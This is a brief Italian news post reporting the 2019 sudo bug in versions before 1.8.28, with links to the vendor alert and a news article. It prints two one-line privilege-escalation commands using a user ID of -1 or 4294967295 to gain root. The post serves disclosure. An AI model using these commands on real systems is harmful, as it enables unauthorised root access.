Un bug in sudo ti consente di eseguire qualsiasi file eseguibile come root se /etc/sudoers ne consente l'esecuzione da altri utenti ed è proibito per root.
Lo sfruttamento dell'errore è molto semplice:
sudo -u#-1 id -u
oppure:
sudo -u#4294967295 id -u
L'errore è presente in tutte le versioni di sudo precedenti alla 1.8.28
Dettagli:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Fonte: linux.org.ru